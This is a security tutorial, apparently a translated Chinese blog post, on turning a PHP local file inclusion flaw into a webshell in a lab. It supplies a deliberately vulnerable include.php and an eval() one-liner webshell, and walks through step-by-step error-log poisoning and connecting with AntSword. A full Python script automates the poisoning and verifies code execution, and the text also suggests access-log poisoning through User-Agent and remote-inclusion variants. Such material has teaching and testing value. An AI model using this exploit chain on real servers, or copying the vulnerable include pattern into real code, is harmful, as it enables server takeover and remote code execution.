
[file inclusion vulnerability-04] Classic interview question: how to getshell when a website is known to have only a local file inclusion vulnerability?

2022-06-25 10:52:00 Like the wind 9

1 Experiment introduction

Requirements: suppose the attacker already knows that a website has a local file inclusion vulnerability and nothing else, in particular no file upload point and no other vulnerabilities. How do they getshell?
Purpose: obtain a shell by exploiting the local file inclusion vulnerability alone.

2 Experimental environment

(1) Target machine

  • The experiment runs on a WAMP stack; for deployment see 《【 Language environment 】WAMP Environment deployment and optimization — With win2008R2SP1 For the operating system 》. The target's IP is 172.16.1.1.

  • Check which PHP version the server runs, because the php.ini you edit in the next step belongs to that version.

  • Open the phpStudy installation folder, locate the folder for PHP-5.4.45, and in its php.ini set allow_url_include to On; save and restart the server afterwards. Note that this switch only matters for remote inclusion and for wrappers such as php://input; the log-inclusion technique below includes a local file and works with allow_url_include left at its default of Off.

  • Under the web root, create a folder FileInclusion, and in it create a text file with the following content, then rename it to include.php:

<?php
// Deliberately vulnerable test page: the include path is taken straight from the query string.
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include $path;   // LFI: any readable local file named here is parsed and executed as PHP
?>

(2) Attacker machine
Install BurpSuite and AntSword on the host machine; for installation see 《【Burp Suite Tools -1】BurpSuite Introduction and detailed explanation of installation process 》 and 《【 Ant sword tool -01】 Website management tools of the Chinese ant sword installation process and application examples 》.

3 The experimental steps

3.1 Getshell by including a log file

Idea: there is no upload point, but we still need a file on the server's local disk that contains a one-liner webshell. Log files record failing requests, so we "write" the one-liner into the error log by making a request that fails, then use the file inclusion to execute the one-liner from inside the log file. The steps are as follows:

(1) Copy the URL of the include page, http://172.16.1.1/FileInclusion/include.php, open Burp Suite's Repeater, right-click and choose Paste URL as request to turn it into a GET request, then click Send. A response comes back, but because no path parameter was passed, the include fails and PHP prints a warning.

(2) In the request line, replace the value of the path parameter with the one-liner <?php @eval($_REQUEST['cmd']);?> and click Send. The response again shows an error: include() tried to open a file with that name and failed. Keep the request line well-formed by encoding the spaces in the one-liner as %20 or +; PHP URL-decodes $_GET before include() runs, so the decoded one-liner, not the encoded form, is what ends up in the log.

(3) Every failed include is logged. On this stack PHP's warnings go to Apache's error log at C:\phpStudy\PHPTutorial\Apache\logs\error.log; open it on the target and the new entry is there. PHP writes the name of the file it could not open verbatim and unquoted, so the entry now contains a complete <?php ... ?> block. When the log file is later passed to include, PHP parses it like any other file: the surrounding log text is emitted as plain output and the one-liner is executed unconditionally.

(4) Connect with AntSword. Open AntSword on the attacker machine → Add data → fill in the URL and the connection password. The URL is http://172.16.1.1/FileInclusion/include.php?path=C:\phpStudy\PHPTutorial\Apache\logs\error.log and the password is cmd, the parameter name read by $_REQUEST['cmd']; click Add.

(5) Manage the server. The new entry appears in the main window; double-click it to manage the server. Every request AntSword sends re-includes the whole log, so the shell keeps working for as long as the log is not rotated or cleared.
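The whole procedure in one script, as an added example that is not part of the original article: it poisons error.log through the failing include(), then includes the log and drives the eval() with a POST parameter the way AntSword does. The target URL, the log path and the password cmd are the lab values from this page; the function names, the probe marker and the sample log line are constructed here, and the sample line only approximates the real Apache/PHP log layout.

```python
#!/usr/bin/env python3
r"""Added example: automate the error.log poisoning from section 3.1.

Lab values taken from the article: include.php takes ?path=, the Apache
error log is C:\phpStudy\PHPTutorial\Apache\logs\error.log, and the
webshell password is "cmd". Everything else (function names, the marker,
the sample log line) is made up for this example.
"""
import urllib.parse
import urllib.request

TARGET = "http://172.16.1.1/FileInclusion/include.php"
LOG_PATH = r"C:\phpStudy\PHPTutorial\Apache\logs\error.log"
PAYLOAD = "<?php @eval($_REQUEST['cmd']);?>"
MARKER = "lfi_log_poison_ok"   # harmless probe output; assumed name

# Constructed sample of the entry the failing include() leaves in error.log.
# The layout only approximates Apache 2.4 + PHP 5.4; the important part is
# that the path appears verbatim and unquoted between the parentheses.
SAMPLE_LOG_LINE = (
    "[Sat Jun 25 10:52:00 2022] [:error] [client 172.16.1.2] PHP Warning:  "
    "include(<?php @eval($_REQUEST['cmd']);?>): failed to open stream: "
    "No such file or directory in C:\\phpStudy\\WWW\\FileInclusion\\include.php on line 4"
)


def poison_url(target=TARGET, payload=PAYLOAD):
    """URL whose include() must fail so that PHP logs the payload.

    URL-encoding the payload is correct, not a problem: PHP decodes $_GET
    before include() runs, and the warning it logs contains the decoded
    string. Encoding also keeps spaces out of the HTTP request line, which
    would otherwise be malformed.
    """
    return target + "?" + urllib.parse.urlencode({"path": payload})


def decoded_path(url):
    """What PHP's $_GET['path'] sees for this URL (used for checking)."""
    return urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["path"][0]


def exec_url(target=TARGET, log_path=LOG_PATH):
    """URL that includes the (now poisoned) log file."""
    return target + "?" + urllib.parse.urlencode({"path": log_path})


def probe_body(marker=MARKER):
    """POST body in the AntSword style: the 'password' is the parameter name
    that $_REQUEST['cmd'] reads; the value is PHP code for eval()."""
    return urllib.parse.urlencode({"cmd": f"echo '{marker}';"}).encode()


def payload_intact(log_text, payload=PAYLOAD):
    """True if the log holds the one-liner verbatim (PHP tags, no quoting or
    URL-encoding), which is what include() needs in order to execute it."""
    return payload in log_text


def shell_alive(response_body, marker=MARKER):
    """True if eval() ran the probe, i.e. the marker came back in the page."""
    return marker in response_body


def run(opener=urllib.request.urlopen):
    """Poison, then verify execution. `opener` is injectable so the logic
    can be exercised against a fake response without a live target."""
    # 1. failing include() -> warning with the raw payload appended to error.log
    opener(poison_url()).read()
    # 2. include the log; the one-liner now runs on every request, and the
    #    POST parameter reaches it through $_REQUEST
    req = urllib.request.Request(exec_url(), data=probe_body(), method="POST")
    body = opener(req).read().decode("utf-8", errors="replace")
    return shell_alive(body)


if __name__ == "__main__":
    print("shell alive:", run())
```

Run it against the lab with python3; the injectable opener lets the same logic be checked against a fake response without a target. Because the warning quotes nothing, payload_intact only needs to look for the one-liner verbatim; a log that held the %3C%3Fphp form instead would be printed back as text rather than executed.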

Extension

(1) Including session files: session leakage
(2) Code audit of the MetInfo 5.0.4 file inclusion vulnerability

4 Summary

Idea: step one, use whatever the target offers to get the one-liner into some file on the server's local disk; step two, get that file parsed as PHP through the inclusion.

Reflection: if the error log is not in its default location, how do we find it, and are there other files that work? The ErrorLog directive in Apache's httpd.conf and PHP's error_log setting (shown by phpinfo()) name the path, and the configuration files themselves can be read through the same inclusion. The access log can be poisoned the same way by placing the one-liner in a request header such as User-Agent.

Reflection: if the target also had a remote file inclusion vulnerability, the attacker could put the one-liner in a file on a second server and include it remotely, yet that does not yield a shell on the target. The likely cause, which deserves a closer look at how the webshell is executed, is that the second server runs PHP too: it executes the file itself and hands the target only the output, so the target includes text rather than code. Serving the payload as a file the second server does not interpret (for example a .txt) avoids this.

Copyright notice
This article was written by [Like the wind 9]; when reposting, please include the original link, thank you.
https://yzsam.com/2022/176/202206251023127180.html